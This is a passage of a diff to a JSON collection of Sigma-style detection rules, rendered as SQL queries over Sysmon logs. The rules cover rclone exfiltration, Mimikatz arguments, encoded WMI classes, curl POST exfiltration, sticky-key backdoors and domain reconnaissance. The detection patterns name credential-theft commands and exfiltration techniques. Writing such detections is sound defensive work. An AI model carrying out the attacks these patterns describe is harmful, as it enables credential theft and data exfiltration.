(CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND 
CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_webshell_detection.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { "title": "HackTool - GMER Rootkit Detector and Remover Execution", 
@@ -24633,1656 +24673,1693 @@ "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' 
ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' 
ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", - "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "title": "Gpg4Win Decrypt Files From Suspicious Locations", + "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "status": "experimental", + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE 
'\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_gpg4win_susp_usage.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Procdump Execution", + "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects usage of the SysInternals Procdump utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Legitimate use of procdump by a developer or administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_sysinternals_procdump.yml" }, { - "title": "HackTool - 
Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", - "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "title": "Potential Recon Activity Using Wevtutil", + "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "status": "experimental", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.discovery" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the utility by administrators to query the event log" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_wevtutil_recon.yml" }, { - "title": "Suspicious Rundll32 Activity", - "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "status": "experimental", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ "attack.defense_evasion", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND 
CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine 
LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_activity.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') 
AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": 
"proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Suspicious Registration via cscript.exe", - "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "status": "experimental", - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "author": "Austin Songer @austinsonger", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" + "filename": 
"proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", - "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Password Spraying Attempt Using Dsacls.EXE", + "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "status": "experimental", + "description": "Detects possible password spraying attempts using Dsacls", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of dsacls to bind to an LDAP session" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_dsacls_password_spray.yml" }, { - "title": "Domain Trust Discovery Via Dsquery", - "id": "3bad990e-4848-4a78-9530-b427d854aac0", - "status": "test", - "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", - "author": "E.M. 
